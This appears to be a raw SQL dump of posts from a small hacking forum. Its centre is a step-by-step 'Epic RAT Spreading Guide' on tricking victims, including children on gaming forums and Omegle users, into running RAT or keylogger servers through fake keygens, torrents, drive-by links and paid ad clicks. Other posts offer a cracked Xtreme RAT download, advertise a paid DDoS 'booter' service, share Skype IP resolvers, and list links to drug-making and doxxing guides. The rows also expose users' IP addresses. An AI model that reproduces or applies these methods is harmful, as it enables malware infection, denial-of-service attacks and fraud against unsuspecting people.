'0', '0', '1', 'd1f9f87e26454d0a2ff21441f79dd293', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4168', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349904273', '-_- I never said they weren\'t lol I was referring to the Darkcomet one though', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '5aae4a10b4ea74dafe2c4bb40c77b514', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4169', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349904441', 'maybe you could help me setup my DC, I don\'t own a crypter but I\'ve asked someone else to FUD it for me and it\'s just gets broken.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ab46e168153993ce247885dbd9846ba5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2743', '544', '0', '12', '[Tutorial] Epic RAT Spreading Guide | Detailed Methods', '0', '203', 'NeonLights', '1348862068', '[align=center]neonlights presents, a guide to successfully spreading! In the last time i saw a lot of people asking for help with spreading there keylogger or there RAT. Now i decided to make a huge tutorial on spreading to help the community. I will start with very basic and famous stuff like youtube and also a few advanced methods. General Things you need: a RAT (ready set-up, make sure its working) a crypter (you will get a lot more victims if your server is FUD) a filehost (for example fileave or dropbox) a computer a brain would not be bad ;D Methods: 1). Youtube In my opinion the most famous and easiest method. It is great if you want to target a special group like people with special accounts, for example steam. 1. Go to youtube.com and register a account if not allready done. 2. In my example i will target people with steam accounts, so i look for some videos with the title \"Steam Hack\" or \"Black Ops Hack/Keygen\" or something like that. You also can look for a paypaal hack video, you will find something you like. 3. When you found a good video, go to keephd.com and download the video in your preferred quality. 4. Then go back to youtube and upload the downloaded video. 5. While uploading, think about an attractiv title for the video, for example \"Black Ops Keygen 100% Working !!!\". In the description put a small text, for example a readme and your server.exe download link. 6. When its uploaded your done. Tips: -At the beginning your views and downloads will only increase slowly but they raise fast and you get a good amount of downloads. - It can help to use a youtube bot to increase views, thumps up etc. to make your video more legit looking, or ask a few friends you haveBiggrin 2). Forums First of all i dont mean hackforums.net !!!! I dont want anybody posting malware here !!! In my opinion its another simple method. There are alot of big and activ forum to post some malware. The best choice are forums with a lot of young members because they download everything they can get and that sounds cool and interesting (i am talking from my own experienceBiggrin). 1. Look for a big forum on google. It will come up a lot of them, i would take one from the first google page. Easiest Forums to spread are gaming/cheating forums because most of them are kids or teenager. 2. Create a new account there with a cool username ( it should look trusting, not \"l33t-haxxor\" or \"i hack you\" ). 3. Design your profile with avatar, signature, some fake details like you want. 4. Make some HQ threads to catch the members attention and make you looking more trusted. 5. After a time make a new thread about a new simple UD wallhack or a working keygen you coded in the last time. Make the thread attractiv and detailed to catch the readers eye. You should add a detailed feature list, screenshots and maybe a short video. 6.You are done. Wait for the first kids downloading your file. Tips: - Make multiple accounts to answer to your thread and vouch for you. These account should also look legit to the others, so not 1 time posters or joined 1 minute before. 3). Torrents Another Easy method that will get some easy Bots for you. 1. Download a torrent program like BitTorrent here: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\" 2. Install BitTorrent if not allready done 3. Go to file -> Create new Torrent 4. Look for your file and select it. Now a new torrent with your file will be created. 5. Go to a famous torrent site like Piratebay.org 6. Upload your new torrent to the site with a detailed description. As title choose something like a paypaal hack or a BF3 Beta keygen, something that will attract many people. 4). Omegle This is more complicated because you dont get that many downloads, you have to work for each one. There are diffrent omegle methods, you only can post your server link to each of them and say its a photo package, but thats not working good. I give you a better method. I think many will know it: 1. Download the program ManyCam which allows you to use a virtual webcam. 2. Install Manycam 3. Download this video pack of a girl. It can wave and do some other things. Download: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\" (this is not my video package, but i used it a few times. Thanks to whoever posted thisBiggrin) 4. Start omegle, ss soon as you get into a conversation with somebody go to your many cam and start the \'Wave\' clip.. So it waves at the person and looks very legit. 5. Start a conversationen about some normal things with him/her. 6. After that ask if he/she wants to see some pictures. 7. Sent him your server.exe or your JavaDriveBy and your done if he opened it. Tips: - If you fail, you can retry as often as you want - You should replace the server.exe icon with a jpg icon and may hide the file ending to make it more legit. 5). JavaDriveBy JavaDriveBys are great. You put them on a site and everyone who visits this site download a hidden file and executes it. If your server is FUD, Most people will not notice something is wrong. I will present you a very simple java drive by, you can search the forums to find more advanced ones. 1. Go to dot.tk 2. In the URL field enter your direct server link. 3. After loading the url, you can change the name of the url to something good looking, for example \"paypaal-hack.tk\" or \"naughty-nude-girls.tk\". 4. After getting this link you can spread it everywhere you want. Tips: -You can spread this with the help of other methods in this tutorial. Say you made a cool new website with a lot of hacking tools and software or you want to show your new website and the people will click on it because they are interested on your site. 6). PTC Sites PTC sites are sites that pay you for visiting links or sites for a short time. For this method we will use a JavaDriveBy that we will advertise on a PTC site for a low amount of money. You will get 2000 views on your link for only $1 1. First of all make your JavaDriveBy ready to work. 2. Then look for a big PTC company. Many of them are scam, but there are a few ones that are ok. I take the site paidtoclick.in 3. Make a new account there and make it ready to work. 4. Click on the advertise button 5. Click on the \"Buy Now\" Button besides the \"Link ad Hits\". Try with $1 6. Create a new link with a title you want, for example money making software or something like that. 7. Put your JavaDriveBy into the target URl field. Leave the rest blank. 8. Then pay for it and wait for the victims Biggrin tips: -The more money you invest the more victims you get. -Try to do it on diffrent PTC sites that are activ. 7). Auto Spreader Auto Spreaders or worms are a helpful thing in spreading. You put your file on a little server and it spreads itself from every slave to other people. Many worms use facebook, msn, 4chan and other communities or chat programs to spread itself. You can spread your worm with the help of the methods above and you will multiple your victims and spreading work. Thanks for reading my Guide, please post a little feedback or give me stuff to edit or make better befor doing all of that u will need to FUD UR SERVER![/align]', '67.68.75.99', '1128549219', '1', '0', '1', '1352011708', '1', 'e792811358d536131632ff4fe70f1ba6', '0', '1352011708'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4157', '798', '0', '15', 'Xtreme Rat 3.5 Cracked', '0', '203', 'NeonLights', '1349887149', '[align=center][img]http://4.bp.blogspot.com/-jTh9TxZucbI/UBK-PDIEwiI/AAAAAAAAAjY/ZfTMIZsfXzo/s1600/LogotipoXtremeRAT.png[/img] This is a tool that allow you to control your computer from anywhere in world. With full support to Unicode language, you will never have problem using this software. Here you can find new updates, informations and tutorials about this software. Send suggestions or problems reports to xtremerat@hotmail.com or newxtremerat@gmail.com For More Information Go to the site Official : http://sites.google.com/site/nxtremerat/ [img]http://imageshack.us/a/img832/8792/53998455.png[/img] Version 3.5 Changes: - Added option to Enable or Disable Skins - Added option to change creation date of your servers (Select Hide Server) - Added Firefox version 10 passwords - Option to change groups fixed - New skins added (download skins.zip and extract it into skins folder) - Option to select a notify image of each server - Many small improvements and bugfixes - Only €40 for unlimited connections and free updates. - FUD version, unlimited connections and free updates €100 LoL €100 Don\'t forget :) here everything is FREE [lock]download: http://www.mediafire.com/?lnrwp4lrgc57fli[/lock] xtreme rat password to login is: 154326 enjoy[/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352010978', '1', '924ecd718f988244143351bba650889d', '0', '1352010978'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2745', '546', '0', '15', 'OverTheRainbow\'s ProxyScanner v1.2', '19', '203', 'NeonLights', '1348862219', '[align=center][img]http://s19.postimage.org/us8ie489v/Capture.png[/img] What does it do? Like Proxy Checker (or any other proxy testing program) you load in a .txt list of proxy servers in the format of host:port, and it scans through them, determines which of them respond and saves the ones that do. How do I use it? It\'s a .jar file compiled using JDK 1.7, so you\'ll need JRE 7 to run it. You can download that here. Once you run it, you simply select the .txt file that contains your list of proxies (usually generated by a program like ProxyFinder), select the number of threads you want it to use (the more threads, the faster it\'ll work - select as many threads as you think your PC can handle for the best results) and wait for it to do its magic! When it\'s done checking through the list you loaded it\'ll automatically save the responding proxies to a .txt file called workingProxies.txt in the same directory as the program. [lock]download: http://adf.ly/382489/http://www.mediafire.com/?dkfwdidjp7a4qw3[/lock] enjoy guys :)[/align]', '67.68.75.99', '1128549219', '1', '0', '1', '1352011371', '1', 'b66f7ff16f2c00ccb607cc4fc538b095', '0', '1352011371'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2746', '547', '0', '19', '[Junk][Junk]Closed by neon', '0', '203', 'NeonLights', '1348862436', 'content removed by neon reason: links arent working...', '67.68.75.99', '1128549219', '1', '0', '203', '1348870130', '1', '899b46efc120e81e227b8cf10c54fa48', '0', '1348870130'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2767', '547', '2746', '19', 'RE: Closed by neon', '0', '82', 'iTzIpod', '1348871231', 'Reported thread. Will be junked soon.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7bb39114da9b8ed0e350d8f9dfb58c4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2768', '547', '2746', '19', 'RE: Closed by neon', '0', '61', 'NXK', '1348872759', 'I removed my link, You didn\'t have to take down the thread man, No hard feelings don\'t worry. [hr] This thread has been junked. [hr] This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '61', '1348872787', '1', '0619d1dd4cbd00cc4917b69da6774a01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2758', '550', '0', '61', '[Method] 10,000 views a day', '0', '82', 'iTzIpod', '1348868820', '[align=center] Note : Not My Method [color=#0000CD]This is the account i did the tut on http://adf.ly/DGdPS 2 Second Video Download Link http://adf.ly/DGdOF Text Tut 1.upload videos about 2 seconds long 2.set them to private so only you can see it 3.go to video manager 4.right click on the videos and then open them in a new tab 5.open them 10 times and do it untill 250 views 6.wait about 4 to 24 hours and you will get the views you can also get partnered easier because if you do 2000 views a day you might get accepted by tgn e.t.c remember you can do this to more than one video [/color][color=#FF0000]There is a quicker way 1.Download a auto refresher on google chrome or firefox 2.Log on to a different youtube account 3.Go on to the video you want views on 4.Go on to auto refresher and set the settings to two seconds and just leave the tab open and you will get loads of views 5.Also the views do not freeze at 300 and you do not get banned[/color][/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e501c12f743bbf1cb958ff595e25c0b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2747', '548', '0', '15', '{Dual APIs and 227 Shells} [HOT] SuperBooter [PMs] [LONG BOOT TIMES] # [API + SHELLS]', '2', '203', 'NeonLights', '1348863073', '[align=center][img]http://i.imgur.com/XsWe4.png[/img] [+] 200+ shells, adding more daily [+] UDP flood [+] Easy to use interface [+] Secure login system [+] Attack logs [+] Skype and Cloudflare resolvers [+] Great staff to help [+] Small amount of users [+] 2 API\'s [+] 1.7 GB/s booting [img]http://i.imgur.com/hjrGS.png[/img] [+] APIs [+] More dedicated shells [+] AutoBuy [img]http://i.imgur.com/YTWIT.png[/img] [img]http://i.imgur.com/XDrvU.png[/img] - 120 Seconds Boottime - $5 per month [img]http://i.imgur.com/OSzHu.png[/img] - 170 Seconds Boottime - $7 per month [img]http://i.imgur.com/XQMKQ.png[/img] - 200 Seconds Boottime - $9 per month [img]http://i.imgur.com/38ee8.png[/img] - 350 Seconds Boottime - $10 per month {Lifetime Package} - 480 Seconds Boottime - $25 one-time payment [img]http://i.imgur.com/mOdfx.png[/img] TERMS OF SERVICE: - Do NOT attack sites that are .gov or .edu - Do NOT attack sites repeatedly - Do NOT share an account - We are NOT responsible for your actions; you take full legal responsibility if you get in trouble! If you break these rules, you will be banned without refund. I don\'t think it\'s too much to ask. Vouch Copies available: NO VOUCHES ANYMORE SO DONT ASK! Support Us! By Telling Ur Friends About Us! :D PM NeonLights For Purchasing Info Or Add Him On skype Thx :)[/align]', '67.68.75.99', '1128549219', '1', '0', '203', '1348864172', '1', 'a10612c0151e10d51f8aa4f46f52db27', '0', '1348864172'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2748', '547', '2746', '19', 'RE: Collection Of Skype Resolvers', '0', '82', 'iTzIpod', '1348863496', 'Thanks for the contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8886551b1cbbb0a011bd23bc75352cd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2749', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '82', 'iTzIpod', '1348863576', 'Welcome to the forum dude. Don\'t worry. t3h jok3r probably asked you. You will get your upgrade soon probably when he logs on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59c23b3e9b1117ee3f2f6c44e70c33ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2750', '547', '2748', '19', 'RE: Collection Of Skype Resolvers', '0', '203', 'NeonLights', '1348863769', '[quote=\'iTzIpod\' pid=\'2748\' dateline=\'1348863496\'] Thanks for the contribution. [/quote] ur welcome :) just wanted to share my awsomme threads :D just aded u on skype btw', '67.68.75.99', '1128549219', '1', '0', '203', '1348863817', '1', 'ede4eb92fd3fedf80bb5e07ae0e03052', '0', '1348863817'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2751', '538', '2732', '63', 'RE: Staff userbar', '0', '2', 'Apathy', '1348863869', 'I will give it a go later.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', 'e6f115d1c96474709e0c3126ed41694a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2752', '539', '2749', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348863919', '[quote=\'iTzIpod\' pid=\'2749\' dateline=\'1348863576\'] Welcome to the forum dude. Don\'t worry. t3h jok3r probably asked you. You will get your upgrade soon probably when he logs on. [/quote] :) this forum is pretty chill :) looks better then ubers and hackforums... just need minor fixes and more ppl', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', 'e90f125d8677c8ca1667ada420cb2c22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2753', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '2', 'Apathy', '1348863988', 'Not bad. 6/10 There is to much white and it does not really jaw a consistent flow. Keep it up though.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '6f28df9ced777c1902aaab6cc48c2456', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2754', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1348866259', 'Gee... Thanks I guess... Worked 2 days for that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '40a6f662548412993260745cbb4d26b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2755', '547', '2746', '19', 'RE: Collection Of Skype Resolvers', '0', '82', 'iTzIpod', '1348866305', 'Also, some of the links are invalid.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5071626ee163ff905a455ca770928921', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2756', '549', '0', '35', 'HQ Thread Design', '0', '82', 'iTzIpod', '1348868557', 'Hello, This is from HF, [img]http://www2.picturepush.com/photo/a/10191170/img/10191170.jpg[/img] HF Link: http://www.hackforums.net/showthread.php?tid=2893720 [url=http://adf.ly/DGdB2][align=center]Click to download[/align][/url]', '24.212.197.164', '416597412', '1', '0', '82', '1348868603', '1', '28962db312c7eb4d020658a4df2a8db5', '0', '1348868603'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2757', '547', '2746', '19', 'RE: Collection Of Skype Resolvers', '0', '61', 'NXK', '1348868704', 'My skype resolver had a adf.fly link I didn\'t give permission to re leak with out it. And my skype resolver it down.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '753bfc34f9a1737a932ae4d10bab786c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2759', '551', '0', '61', 'Dexter\'s Thread Design', '0', '82', 'iTzIpod', '1348868901', 'Dexter was editing and sending this to a few people just as a finished image, but to get the psd it cost $3.00, so here is the PSD :hurr: Preview: [IMG]http://i.imgur.com/R477M.png[/IMG] [size=large][url=http://http://adf.ly/DGdd4]DOWNLOAD![/url][/size]', '24.212.197.164', '416597412', '1', '0', '82', '1348868922', '1', '8c5170e2e6e73a9b45f020119d1c0616', '0', '1348868922'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2760', '552', '0', '61', 'Bunch of eBooks', '0', '82', 'iTzIpod', '1348869024', 'Download: http://adf.ly/DGdhk This contains over 5 eBooks that I don\'t think are on L33tHacking yet.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '534fcf93c70960d5e5fbbb197d8109f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2761', '553', '0', '61', 'How to Control Coke Machines (Tutorial)', '0', '82', 'iTzIpod', '1348869149', 'To View: http://adf.ly/DGdrJ To Download: http://adf.ly/DGdub', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9afb9de7d2b5bb6e0b09efd33c9d29d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2762', '554', '0', '61', 'eBook ($4/Day)', '0', '82', 'iTzIpod', '1348869361', 'Here is an E-book on how to get 4$ a day by doing hardly anything. To View: http://adf.ly/DGe0n To Download: http://adf.ly/DGeFA Let me know what you think of it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2703891e0ea99c739a5e245c3ea3ce29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2763', '555', '0', '61', 'Apple Method', '0', '82', 'iTzIpod', '1348869508', 'I\'m feeling generous... it works, but involves boxing. I created it myself, and normally sell it for $100, so please don\'t bash this thread. I may release my gc method publicly (once I\"m green or something). We\'ll see. Anyways, enjoy. Use this information at your own risk. I am not responsible for what is done with this material. Also note it is for educational purposes only. To View: http://adf.ly/DGeMU To Download: http://adf.ly/DGeFA PW to PDF: SquillyCreated', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '92c3acf29843f699928c83be915fa42f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2764', '556', '0', '61', 'Free Skype IP Resolver - WebBased', '0', '82', 'iTzIpod', '1348869725', 'ust register on their site. Once you are in you\'ll be redirected to booter page, just insert the skype username :) 100% vouche this resolver [b][url=http://adf.ly/DGekT]Register and start resolving[/url][/b] [/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be62f9f250f8688fd903a5d6da02a80d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2765', '557', '0', '61', '? ? MASSIVE COLLECTION OF HQ AND USEFUL EBOOKS & TUTORIALS ? ?', '0', '82', 'iTzIpod', '1348869795', '[align=center] [url=http://www.mediafire.com/view/?biy08kvh6mai1yd]How to Create Your First Website and Make Money[/url] [url=http://www.mediafire.com/view/?ed34t591ygaom7u]How to Make Software and Make Money From It[/url] [url=http://www.mediafire.com/view/?u3qqh3ljzsixnyf]Secrets to Wild Sex[/url] [url=http://www.mediafire.com/view/?f8ssy1y6qp16t1z]How to Get Free Mcdonalds[/url] [url=http://www.mediafire.com/view/?8wwah0c1ggsf3g7]How to Pick Any Lock Guide 1[/url] [url=http://www.mediafire.com/view/?0r668tw8i461u0x]How to Pick Any Lock Guide 2[/url] [url=http://www.mediafire.com/?sa7t8sz31he9hxt]12,000 Essays[/url] [url=http://www.mediafire.com/?dfzoymd23wxpq2p]Thousands Of Public and Private Shells[/url] [url=http://www.mediafire.com/?zutdxua3het34z4]How to Grow Medical Marijuana[/url] [url=http://www.mediafire.com/view/?cp1xnc27fxqci8d]How to Grow Magic Mushrooms[/url] [url=http://www.mediafire.com/?dadjl31ht2ehej7]How to Make Hash Oil[/url] [url=http://www.mediafire.com/view/?2x2239rlqok04pn]How to Make LSD[/url] [url=http://www.mediafire.com/view/?f6395d1t5cxnty3]How to Make Ecstasy[/url] [url=http://www.mediafire.com/view/?dy69a572q67o1ss]How You Can Learn Any Language In A Fraction Of The Time You Spend Learning By Traditional Methods[/url] [url=http://www.mediafire.com/?t4el45rmgdtsuy6]How to Be Completely Anonymous and Hidden[/url] [url=http://www.mediafire.com/?1ox74cpgiagpxq6]Learning Japanese[/url] [url=http://www.mediafire.com/view/?mdgeca33erysmcv]Free Soft Drinks + Snacks[/url] [url=http://www.mediafire.com/view/?socw11k1ksa6bz6]How to Lose Weight[/url] [url=http://www.mediafire.com/view/?rpwna55ja1rb1ga]How to Get Free NetFlix[/url] [url=http://www.mediafire.com/view/?ko4tuigz3gol1r2]Life Hacks[/url] [url=http://www.mediafire.com/?y7kulgcptpsy0pu]Everything You Need to Know About Lucid Dreaming and Sleep Paralysis[/url] [url=http://www.mediafire.com/view/?xat9ulxh7dcihol]Anti-Forensics Guide[/url] [url=http://www.mediafire.com/view/?8qf2dvlf22lb853]Dox Methods[/url] [url=http://www.mediafire.com/view/?y599kjnlcfl88mg]How to Get Free Alienware Laptops[/url] [url=http://www.mediafire.com/?dj08l0m7osb8rn1]How to Get a Free Kindle Fire or DX[/url] [url=http://www.mediafire.com/view/?uid83k05ym82814]How to Get Free Games From Blockbuster[/url] [url=http://www.mediafire.com/view/?3tb9xp16i12ceva]How to Get Free Subway For Life[/url] [url=http://www.mediafire.com/view/?7q8zeol68qgl03l]How to Get a Free Whopper[/url] [url=http://www.mediafire.com/view/?5jr5mif63auev57]How to Get Free Stuff From eBay[/url] [url=http://www.mediafire.com/view/?asp757ohu8hlhv8]How to Get Free Nike Fuel Bands[/url] [url=http://www.mediafire.com/view/?1j16dl9y40h7cf4]Strategic Blog Traffic[/url] [url=http://www.mediafire.com/?i3h116bcdcbbw7z]Fake Coupons For Discounts and Free Stuff (USA Only)[/url] [url=http://www.mediafire.com/?bndw39s25b6acb5]Amazon Receipt Generator[/url] [url=http://www.mediafire.com/view/?dk6k9s7se10cerp]How to Get The Caller ID of an Unknown Number[/url] [url=http://www.mediafire.com/view/?f20hcjli4tg4a9z]How to Get Approved By File Ice[/url] [url=http://www.mediafire.com/view/?9h6ec51w3zdl8dj]Google Detonator 2.0[/url] [url=http://www.mediafire.com/view/?665mcnhbgnfhw1i]How to Get Your Own Mastercard [Legal, Free and Worldwide! Any Age!][/url] [url=http://www.mediafire.com/view/?orhvxfhd65xx6iv]100,000 U.S.A. Email Addresses[/url] [url=http://www.mediafire.com/view/?v0jp65pq7fiqcvm]How to Get Almost Any Woman to Have Sex With You[/url] [url=http://www.mediafire.com/view/?vhweqqbbcl8jw6k]How to Touch A Girl[/url] [url=http://www.mediafire.com/view/?fbry435375qjz7r]10 Masturbation Tips From Women[/url] [url=http://www.mediafire.com/view/?z5rx4wlpp47vgfn]How to Instantly Attract Any Woman You Want[/url] [url=http://www.mediafire.com/view/?12ibili9v5b55pt]How To Get A Girl\'s Number In 3 Minutes[/url] [url=http://www.mediafire.com/?83b9nv7ffybdytg]IMnuke VIP Section LEAKED[/url] [url=http://www.mediafire.com/?6kfyffftcz3przn]4746-1 Million Serial Numbers of Different Softwares[/url] [url=http://www.mediafire.com/?6njhzd07ejydqdh]Forum Bot 2.4[/url] [url=http://www.mediafire.com/?mktb6tvnslyj901]International SMS Bomber[/url] [url=http://www.mediafire.com/?c49dp5z2da5aojz]Fraps[/url] [url=http://www.mediafire.com/?tfi9jkx4dhyi4wt]MineCraft Server[/url] [url=http://www.mediafire.com/?hdj301wpfxpjie3]BlackHat Library[/url] [/align] [align=center][url=http://www.mediafire.com/?7xey64ytiv35oqz]4,000 eBooks[/url] [spoiler][url=http://pastebin.com/iZdyHpA3]View Titles Here[/url][/spoiler] [url=http://www.mediafire.com/?gxklx5zd4wd3scw]Exploiting (25 MB)[/url] [spoiler] Extreme Exploits - Advanced Defenses Against Hardcore Hacks (2005) Hacking - The Art Of Exploitation (2003) Shellcoder\'s Programming Uncovered (2005) The Shellcoder\'s Handbook - Discovering And Exploiting Security Holes (2004)[/spoiler] [url=http://www.mediafire.com/?cbguuhw9z0gqpq3]Hacking (77 MB)[/url] [spoiler] Batch File Programming Cracking The 